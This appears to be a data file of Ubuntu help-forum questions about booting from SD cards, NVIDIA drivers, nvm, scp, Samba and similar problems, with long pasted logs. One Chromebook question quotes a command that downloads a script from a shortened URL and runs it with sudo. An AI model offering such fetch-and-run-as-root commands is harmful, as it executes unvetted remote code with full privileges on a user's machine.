501474	start ubuntu from sdhc card without booting into it	i have a sdhc card from which i can not boot , ecause the internal sdhc reader of my lenovo laptop is n't recognize it . i can boot from it on my other notebook without any problems . nevertheless i can mount and access the sdhc card from the first notebook . is it in any way possible to start the sdhc ubuntu os on the first notebook after booting into its main ubuntu os ?
501476	strange desktop wallpaper at xubuntu 14.04 startup:	when i start my computer i have this : after 2-3 seconds the menu loads , my normal wallpaper and all other , but why is this showing is it something to worry about and how to fix it ?
501482	internal card reader does n't recognize my sdhc ubuntu os card only at boot time	i have two notebooks both lenovo 's : a t510 and a x200s . on the x200s i can boot from the sdhc card into my ubuntu os . with the same sdhc card my t510 does n't show me the sdhc ubuntu card in the boot menue . nevertheless , after booting the t510 via hdd into the main ubuntu os , i can access the sdhc card .
501484	empaty and telepathy not needed	i have removed empathy , because i do not use any of the clients , which were available there . i would like to remove telepathy also . however , i use skype occasionally . i am curious if i remove telepathy this is going to affect skype in any way ? is it save for the rest of the system ?
501485	having trouble to find the node in ubuntu 14.04 after installing	i installed the nodejs in ubuntu 14.04 by nvm by following this site installing nodejs though i had the following problem as nvm ls sbin mkdir : can not create directory â/usr/sbin/aliasâ : permission denied then i found to resolve this as ( from nvm solution ) $ export nvm_dir=~/.nvm $ echo $ nvm_dir /home/roy/.nvm then it works fine . now the problem , i face is that if i restart or even open a new console , i ca n't find the node again . roy @ croy : ~ $ node -version the program 'node ' can be found in the following packages : * node * nodejs-legacy try : sudo apt-get install < selected package > i have to follow those steps , i do nvm install 0.11.13 then it shows v0.11.13 is already installed . now using node v0.11.13 here is my stackoverflow question - the following answer is not working . how to come out from here ?
501487	m17n input not recognized by chrome	i am having a problem with a m17n input , m17n : wijesekera to be exact . the input is recognized by all applications except google-chrome there is a small issue starting google-chrome on my workstation also . searching for it via gnome menu will not start it . i have to open terminal and type google-chrome to start it . when starting i see the following warnings/errors as well . could this be related to why the input is not working. ? i tested with few other m17n input languages and all have the same behavior on chrome . they all type in english within chrome . devzer0 @ devzer0-h87m-d3h : /opt/google/chrome $ google-chrome gtk-message : failed to load module `` overlay-scrollbar '' gtk-message : failed to load module `` unity-gtk-module '' [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , [ 6273:6273:0723/115940 : error : browser_main_loop.cc ( 218 ) ] gtk theme error : unable to locate theme engine in module_path : `` murrine '' , glib-gio-message : using the 'memory ' gsettings backend . your settings will not be saved or shared with other applications . [ 6273:6273:0723/115940 : error : component_loader.cc ( 138 ) ] failed to parse extension manifest . [ 6273:6273:0723/115940 : error : desktop_window_tree_host_x11.cc ( 1289 ) ] not implemented reached in void views : :desktopwindowtreehostx11 : :mapwindow ( ui : :windowshowstate ) [ 6273:6448:0723/115945 : error : get_updates_processor.cc ( 214 ) ] postclienttoservermessage ( ) failed during getupdates alsa lib conf.c:3314 : ( snd_config_hooks_call ) can not open shared library libasound_module_conf_pulse.so alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm default [ warning : flash/platform/pepper/pep_module.cpp ( 63 ) ] sandboxed [ 6273:6302:0723/132232 : error : connection_factory_impl.cc ( 287 ) ] failed to connect to mcs endpoint with error -21 [ 6273:6302:0723/132235 : error : connection_factory_impl.cc ( 287 ) ] failed to connect to mcs endpoint with error -137 [ 6273:6302:0723/132235 : error : connection_factory_impl.cc ( 287 ) ] failed to connect to mcs endpoint with error -137 [ 6273:6302:0723/132237 : error : connection_factory_impl.cc ( 287 ) ] failed to connect to mcs endpoint with error -21 [ 6273:6448:0723/133054 : error : get_updates_processor.cc ( 214 ) ] postclienttoservermessage ( ) failed during getupdates [ 6273:6448:0723/143154 : error : get_updates_processor.cc ( 214 ) ] postclienttoservermessage ( ) failed during getupdates [ warning : flash/platform/pepper/pep_module.cpp ( 63 ) ] sandboxed [ 6305:6305:0723/074627 : error : gles2_cmd_decoder.cc ( 10128 ) ] [ .compositor-0xfa1b1540 ] gl error : gl_invalid_operation : glconsumetexturechromium : invalid mailbox name [ 6305:6305:0723/074627 : error : gles2_cmd_decoder.cc ( 6012 ) ] [ .compositor-0xfa1b1540 ] render warning : texture bound to texture unit 0 is not renderable . it maybe non-power-of-2 and have incompatible texture filtering or is not 'texture complete' [ 6273:6297:0723/144834 : error : generic_change_processor.cc ( 483 ) ] passwords failed to load passwords node . actonpasswordstorechanges @ ../../components/password_manager/core/browser/password_syncable_service.cc:299 , bad entry [ 6273:6297:0723/144834 : error : generic_change_processor.cc ( 486 ) ] update : bad entry . [ 6273:6273:0723/144834 : error : generic_change_processor.cc ( 484 ) ] passwords datatype error was encountered : failed to load passwords node . actonpasswordstorechanges @ ../../components/password_manager/core/browser/password_syncable_service.cc:299 , bad entry [ warning : flash/platform/pepper/pep_module.cpp ( 63 ) ] sandboxed additional info linux devzer0-h87m-d3h 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux
501488	sync evolution with android apps through owncloud or other centralised online source	i 'm hoping someone can help with this as i 'm so close to achieving my perfect workflow environment . i have ubuntu 14.04 installed on a laptop and an android smartphone . overall what i 'd like to achieve is having my files , contacts , calendars , tasks and notes ( memos ) synced across both devices and being able to view/edit them through a browser . i already have an owncloud account with a provider and have managed to successfully sync contacts and calendars with evolution using the davdroid android app . using the my own notes android app i 'm able to access my notes in owncloud , however i have found no way to access them through evolution ( or any other desktop app i 've tried ) . i use the task sync app in android to sync tasks with my android phone and evolution , however the outcome is somewhat buggy , this is more the android app 's fault than anything else i think . prior to this i was using all google services , however i would like to move away from them if possible . basically my questions are : is there a method i can sync my owncloud notes with evolution and my smartphone ? is there a better approach to syncing tasks through owncloud ? has anyone successfully synced evolution with all owncloud apps ? is there another centralised sync service besides owncloud that i can use which would meet my needs ?
501489	software updater terminates unexpectedly	i am currently facing the problem that ubuntu software updater offers me to install some updates , but after hitting install the process terminates . this started last week and first i thought that the updater would maybe install the updates in the background ( i have n't got any crash reports ) . the updates have not been installed and the list of available updates gets longer and longer . currently 124 mb need to be installed , but the procedure is always the same : i hit install and the window disappears silently . i thought that insufficient memory could be the cause ( kernel updates are also included ) , but i got 100 mb on boot and 9 gb on home of free space left and that should of course be enough .
501493	ca n't boot without another hdd	i 've two problems : i took my old hdd and put it in a hard-drive enclosure . then i connected this to an notebook which is running on windows vista . i also connected a usb stick with ubuntu 14.04 with the notebook . next step was to install ubuntu on the external hdd . after the installation i had to make a restart to start with ubuntu . i turned off the notebook and changed the bios to boot on the external hdd . i turned it on and . nothing happened . okay , i decided to boot the internal hdd from the notebook . then a purple window from ubuntu appeared asking if i wan na start ubuntu or windows vista . i choose ubuntu and it worked . after that i did the same and chose windows . it worked as well . but now i ca n't boot the internal hdd without having the external hdd connected to the notebook . it says something like error grub rescue . that is problem one . problem two is that i wan na use my hdd in the hard-drive enclosure also without this notebook . i wan na connect it to other computers . what can i do ?
501494	desktop not working ubuntu 14.04 lts	i 'm using unity for quite some time now but for the past few days now i do not see anything on my desktop , unity itself seems to be working fine , my launcher still works and my top-bar works fine as well . however nothing from my home/desktop folder appears on my desktop and the background image is the same as my lock screen image and i am not able to change it . i tried using the gnome desktop environment but the problem preexists . i also tried to reinstall unity , ubuntu-desktop and my graphics card driver , nothing has worked so far .
501495	netbeans ide looks	my netbeans ide 8.0 does n't gets looks like gtk and dose n't use preferences ( ui ) of ubuntu 14.04 lts it 's default apps can looks like most ubuntu ui colors . why it dose n't looks like that ? it using black bacground color from entire os why it dose n't looks like that , see background color of menu item my ubuntu 14.04 looks like that it should use black color as menuitems bacground . please tell me how i can apply look of entire os ubuntu 14.04 to netbeans ide 8.0 on ubuntu 14.04 ?
501496	hot to install tor with meek support	is there any easy way to install and run tor with meek support on ubuntu ? https : //trac.torproject.org/projects/tor/wiki/doc/meek beside it is possible to download the bundle archive i 'm interested in a native way : - installing tor is enough or i need any extra software to enable meek ? - how to configure torrc ?
501499	shell scripting,	i made a simple update script . now my question was is it possible to run it automatically by loggin in on the ubuntu desktop and automatically provide my password ( sudo ) for this so i do n't have to do anything to keep it updated . this is my script : # ! /bin/bash sudo apt-get update sudo apt-get dist-upgrade -y i would really be helped with this .
501502	troube dualbooting ubuntu 14.04 after install on windows 7 disk	i have spent countless hours over the past week following all kinds of tutorials to get ubuntu 14.04 to run on my laptop alongside windows 7 , both x64 . after systematically trying every seemingly sensible suggestion i now turn to you . brief summary of specs : laptop samsung ativ book 8 870z5e x04 samsung 840 pro ssd windows 7 pro x64 installed over usb . backed up disk with acronis live usb before ubuntu . ubuntu 14.04 lts desktop x64 live usb easybcd 2.2 installed on windows now , for what i have been trying : windows does not boot , if i switch bios to csm or uefi . have to keep option both activated . ubuntu install does not give me the `` install alongside '' option . always had to do either a clean install ( worked fine but without windows anymore ) or do `` something else '' in which case i created a `` / '' `` swap '' and `` /home '' . sometimes i even tried with a 1mb bios reserved boot . having the dropdown for bootloader choice below the table set to either sda or `` / '' . imgur.com/ffjuvmr.jpg boot-repair ran over ubuntu live usb several times . never really got me anywhere . easybcd seemed like a sensible option and systematically added and tried out all the options available in the `` add new entry '' = > `` linux/bsd '' with every possible combination of the following : [ grub ( legacy ) , grub2 , lilo/elilo ] each with any option of [ autimatically locate and load , partition 1 , 2 , 3 , 4 , 5 and 6 . as a result there is always the same error , telling me that : http : //imgur.com/jbzrdsh.jpg . one thing that i noticed though : there is a 1mb of free , unallocated space visible in partitioning during install ( not visible in gparted ) just before the windows 100m sda1 partitioned fat32 . except for that windows only has it 's own , main sda2 . any ideas how to proceed ?
501505	ubuntu 14.04 `` [ errno 5 ] input/output error '' during installation	i have been trying to install a fresh copy of ubuntu 14.04 ( 64 bit version ) on my desktop pc from a usb memory stick , but i 'm experiencing a problem . each time i attempt an install i received an `` [ errno 5 ] input/output error '' , followed by the following message before the installer exits : '' the installer encountered an error copying files to the hard disk : [ errno 5 ] input/output error this is often due to a faulty cd/dvd disk or drive , or a faulty hard disk . it may help to clean the cd/dvd , to burn the cd/dvd at a lower speed , to clean the cd/dvd drive lens ( cleaning kits are often available from electronics suppliers ) , to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment . '' in order to attempt to remedy this i have so far tried installing ubuntu to two different hard disks , one of which is brand new , and each time i have received the same error `` errno 5 '' message . i have also tried installing from 3 different usb sticks using torrent and ubuntu site iso images burned using both unetbootin and startup disk creator . again , these measures have proved fruitless . the installation process varies depending of the iso i use , with the ubuntu download page iso exiting at an earlier stage compared to the torrented iso . the later torrent iso returns an error and exits when i am prompted for my name , computer 's id and password . i 've never experienced anything like this when installing previous versions of ubuntu . i 'm absolutely stumped ! does anyone have any more ideas ?
501507	scp push and ssh issues	i used to be able to ssh with the servers ( centos release 6.4 ) local ip : 10.0.5.152 until an employ made some changes to our setup which also generated a new ip address on my machine , from 10.101.0.152 to 10.101.0.102 . now i ca n't ssh to the server using it 's local ip , i need to use the amazon public ip . other than that now i ca n't scp files from the server to my ubuntu machine . yet i can from my ubuntu machine scp ( pull ) files from the server ( no password required ) . i debugged the scp issue from the server using scp -v which stopped at : debug1 : ssh2_msg_kexinit sent [ root @ ip-10-0-5-152 images ] # scp -v in.png nicox @ 10.101.0.102 : /home/nicox executing : program /usr/bin/ssh host 10.101.0.102 , user nicox , command scp -v -t /home/nicox openssh_5.3p1 , openssl 1.0.0-fips 29 mar 2010 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to 10.101.0.102 [ 10.101.0.102 ] port 22. debug1 : connection established . debug1 : permanently_set_uid : 0/0 debug1 : identity file /root/.ssh/identity type -1 debug1 : identity file /root/.ssh/id_rsa type 1 debug1 : identity file /root/.ssh/id_dsa type -1 debug1 : remote protocol version 2.0 , remote software version openssh_6.2p2 ubuntu-6ubuntu0.4 debug1 : match : openssh_6.2p2 ubuntu-6ubuntu0.4 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.3 debug1 : ssh2_msg_kexinit sent i probably need to make some changes on the servers /etc/ssh files or update .ssh , yet none of the files according to date have been changed since the issue came up . i 'm logging into the server with user name that has root privileges .
501508	ca n't install nvidia 304 updates on hwe 12.04.5	i 've upgraded my 12.04 lts to the new hwe bringing the kernel to 3.13.0-32-generic # 57~precise1-ubuntu . my graphics card is a nvidia 7600 gs and needs to use 304-updates to work . when upgrading to the new hwe the graphics driver was removed and now i 'm running on the built in driver . i ca n't install 304 as it gives me this error : nvidia-304-updates : depends : xorg-video-abi-11 or xorg-video-abi-12 but it is not installable or xorg-video-abi-13 or xorg-video-abi-14 e : unable to correct problems , you have held broken packages . any thoughts as to what might fix my problems ? also if i go to the additional drivers page it just turns up blank .
501510	how to get rid of multiple duplicate menus in firefox bookmarks library ?	in my firefox bookmarks in ubuntu 14.04 , every single folder in my library is duplicated , and i ca n't delete these duplicates . the duplicates are also linked , so if i change one , it changes the other . this is a little hard to explain , so i have also posted a screenshot .
501511	ca n't update my ubuntu 13.04	first i just tried to install a software : sudo apt-get install xvfb it returns : err http : //br.archive.ubuntu.com/ubuntu/ raring-updates/main xvfb amd64 2:1.13.3-0ubuntu6.2 404 not found [ ip : 200.236.31.4 80 ] err http : //security.ubuntu.com/ubuntu/ raring-security/main xvfb amd64 2:1.13.3-0ubuntu6.2 404 not found [ ip : 91.189.91.13 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/x/xorg-server/xvfb_1.13.3-0ubuntu6.2_amd64.deb 404 not found [ ip : 91.189.91.13 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? i just ran apt-get update and it returns a lot of 404 not found repositories from this same ip . so i tried to update my system : sudo update-manager -d but it returns : failed to load repository information , check your internet connection . what should i do ?
501517	how to install .colors scheme in ubuntu unity ?	the title says much . so how do you do it ? this is the theme i want to install wonton soup kde , i want to install in ubuntu unity 14.04
501520	samba domain setup	i have set up ubuntu server on an hp-proliant . idea is a simple smb-file server setup with restricted user rights in a mixed win/lin/osx lan to achieve this i thought out a domain setup with samba . due to lag of proper dvd-drive we used the mini-iso for install . although i have followed a huge amount of man-pages and the samba is running ( i can see the shares ) i do fail to register clients to the domain or handle the access rights . windows user rights are not able to access the server , lifting them into the winnt domain on ubuntu fails . all documentation i found is old and does only apply partially so i wonder if there is actually a full step-by-step guide that applies to the recent ubuntu server revision and packages . ? ? ? due to my limited linux server knowledge i am depending on man-guides to achieve my stuff.thus i am pretty frustrated with not getting where i want to be thx
501521	install ubuntu on chromebook	i 'm quite new here ! xd my friend ask me to help her installing ubuntu on her chromebook , and i followed the guide here : http : //chromeos-cr48.blogspot.com/2012/04/chrubuntu-1204-now-with-double-bits.html but i met a problem ... in developer mode , i log in as `` chronos '' , and run wget http : //goo.gl/34v87 ; sudo bash 34v87 but after downloading all these files , ubuntu-1204.binxx.bz2 ( where xx is aa , ab , ac , ad , ae , af ... ba , bb , bc ... all the way to bz ) ubuntu installation was not successful . and chromebook just reboot itself , then chromeos again ... like nothing happened > . < i tried several times , but still the same . and every time i start the downloading , chromebook downloads some of the files again , cause hash does n't fit ... ... does anyone have idea how to deal with my problem ? thanks for your time ! ! ! ps . my english is not very good=0= hope you can understand my question ... thanks ! ! !
501522	installation ncurses to run command menu config	i am trying to upload new kernel apart from default one . but while installing ncurses getting error i tried with following options 1 ) sudo apt-get install ncurses-dev then got error 404 not found [ ip : 91.189.92.201 80 ] 2 ) sudo gedit /etc/apt/sources.list and change souce page to in.old-releases.ubuntu.com 3 ) sudo apt-get install ncurses-dev error : package 'ncurses-dev ' has no installation candidate
501524	ubuntu with system on mdadm , broken grub , wo n't boot	my old disc started failing so i decided to change it . while moving data to a new disk , seeing how big it is , i though it would be a good decision to split the disk and add some insurance with raid1 array . what can get wrong , right ? now it wo n't boot . i think i should have first moved the system , then add raid functionality . doing both at the same time was a bad decision . i did copied all the data , including hidden files . then edited fstab , ran udate-initramfs , update-grub and grub-install during the boot i get an error : error 17 : can not mount selected partition . then i can choose between kernel versions ( ubuntu 13.10 kernel 3.11.0-17 ... 23 ) all giving the error . i can not revert the process as the old disc is no longer working . i am accessing the system through ubuntu installer - rescue mode - mount filesystem md127 ( this rescue mode can detect and mount the raid partition without problems ) output of fdisk , blkid , fstab : http : //imgur.com/eiibcbm , e9i09py # 0 mdadm config , detail and scan : http : //imgur.com/eiibcbm , e9i09py # 1 do you need any more data ? thank you for your tips .
501528	x window , x windows , x11	while learning shell , i 've bumped many times on the term `` x window '' , so i searched the internet for deffinitions . but i have to admit they were a bit confusing in a sense : -i know they 're the principal gui where interactions with the keyboard/mouse happen . -according to wikipedia , there 's a difference between x window and x windows . what are they exactly , what 's their use ? and what does the 'x ' stand for ?
501529	can i compute lenght of mkv/avi movie and jump to the middle via cli in vlc ?	it is possible in headless mediatomb/vlc streaming server to compute somehow lenght of movie and jump via command line to the middle of this movie ? in mediatomb when i 'm using transcode it is impossible to fast forward/backward movie . so maybe i can create another `` virtual object '' for every long movie to start from a middle .
501533	update broke graphics driver , no gl , no unity 3d , geforce 610m	about a month ago an automatic update and a seven day-streak with no reboot somehow broke my graphics capabilities , rendering me unity 2d 'd and video-game-less . i suspect it is to do with driver versions or kernel modules not loading . please help . : ) what i have tried installing/reinstalling nvidia-331 , nvidia-331-updates , xserver-xorg-video-nouveau-lts-quantal , and others , rebooting lots of times . technical info distro : ubuntu 12.04 lts 64 bit graphics card : nvidia geforce 610m uname -a : linux xxxx 3.5.0-54-generic # 81~precise1-ubuntu smp tue jul 15 04:02:22 utc 2014 x86_64 x86_64 x86_64 gnu/linux lspci -v : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) subsystem : lenovo device 3977 flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : da000000-daffffff prefetchable memory behind bridge : 00000000d0000000-00000000d9ffffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 3901 flags : bus master , fast devsel , latency 0 , irq 44 memory at db000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : lenovo device 3977 flags : bus master , medium devsel , latency 0 , irq 41 memory at db600000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) subsystem : lenovo device 3977 flags : bus master , fast devsel , latency 0 , irq 43 memory at db614000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei kernel modules : mei 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 3977 flags : bus master , medium devsel , latency 0 , irq 16 memory at db619000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : lenovo device 3977 flags : bus master , fast devsel , latency 0 , irq 45 memory at db610000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : db500000-db5fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 memory behind bridge : db400000-db4fffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : lenovo device 3977 flags : bus master , medium devsel , latency 0 , irq 23 memory at db618000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci_hcd 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) subsystem : lenovo device 3977 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel modules : lpc_ich 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : lenovo device 3977 flags : bus master , 66mhz , medium devsel , latency 0 , irq 42 i/o ports at 4088 [ size=8 ] i/o ports at 4094 [ size=4 ] i/o ports at 4080 [ size=8 ] i/o ports at 4090 [ size=4 ] i/o ports at 4060 [ size=32 ] memory at db617000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci kernel modules : ahci 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) subsystem : lenovo device 3977 flags : medium devsel , irq 10 memory at db615000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at 4040 [ size=32 ] kernel modules : i2c-i801 01:00.0 vga compatible controller : nvidia corporation gf119m [ geforce 610m ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device 3901 flags : bus master , fast devsel , latency 0 , irq 16 memory at da000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=128m ] memory at d8000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 3000 [ size=128 ] expansion rom at < ignored > [ disabled ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia_331_updates , nouveau , nvidiafb 02:00.0 ethernet controller : qualcomm atheros ar8162 fast ethernet ( rev 10 ) subsystem : lenovo device 3979 flags : bus master , fast devsel , latency 0 , irq 16 memory at db500000 ( 64-bit , non-prefetchable ) [ size=256k ] i/o ports at 2000 [ size=128 ] capabilities : < access denied > kernel driver in use : alx kernel modules : alx 03:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) subsystem : broadcom corporation device 0587 flags : bus master , fast devsel , latency 0 , irq 17 memory at db400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : wl kernel modules : wl , bcma lsmod : module size used by nvidia 10670775 0 bnep 18240 2 rfcomm 47562 12 parport_pc 32867 0 ppdev 17114 0 lib80211_crypt_tkip 17391 0 wl 3074942 0 coretemp 13642 0 kvm 422160 0 uvcvideo 78117 0 ghash_clmulni_intel 13221 0 videobuf2_core 33025 1 uvcvideo videodev 125126 2 uvcvideo , videobuf2_core aesni_intel 51134 0 snd_hda_codec_hdmi 32532 1 cryptd 20531 2 ghash_clmulni_intel , aesni_intel videobuf2_vmalloc 12861 1 uvcvideo videobuf2_memops 13405 1 videobuf2_vmalloc btusb 22432 0 snd_hda_codec_conexant 62363 1 rts5139 350620 0 bluetooth 212001 24 bnep , rfcomm , btusb aes_x86_64 17256 1 aesni_intel binfmt_misc 17541 1 joydev 17694 0 snd_hda_intel 34063 3 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec snd_pcm 97523 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq microcode 23030 0 cfg80211 208382 1 wl dm_multipath 23306 0 lib80211 14382 2 lib80211_crypt_tkip , wl i915 539800 2 drm_kms_helper 49259 1 i915 drm 290595 3 i915 , drm_kms_helper psmouse 102759 0 alx 73500 0 snd 83674 16 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device mei 41410 0 scsi_dh 14589 1 dm_multipath i2c_algo_bit 13565 1 i915 serio_raw 13216 0 mdio 13808 1 alx ideapad_laptop 18235 0 soundcore 15092 1 snd sparse_keymap 13891 1 ideapad_laptop mac_hid 13254 0 snd_page_alloc 18573 2 snd_hda_intel , snd_pcm lpc_ich 17145 0 video 19653 1 i915 nls_iso8859_1 12714 1 lp 17800 0 parport 46563 3 parport_pc , ppdev , lp ahci 25869 3 libahci 31434 1 ahci eta : lspci -v for lspci eta2 : @ mchid 's answer i ran the commands as prescribed . no change seem to have occurred , i am still in unity 2d , and my test-case game ( mednafen on a gba rom ) reports glx to be broken still . closing lightdm reported the following : [ 2455.794755 ] bbswitch : no suitable _dsm call found . eta3 : @ mchid 's comment ( see below ) glxinfo in terminal-7 ( i.e . in the `` main '' one ) : xlib : extension `` glx '' missing on display `` :0.0 '' . 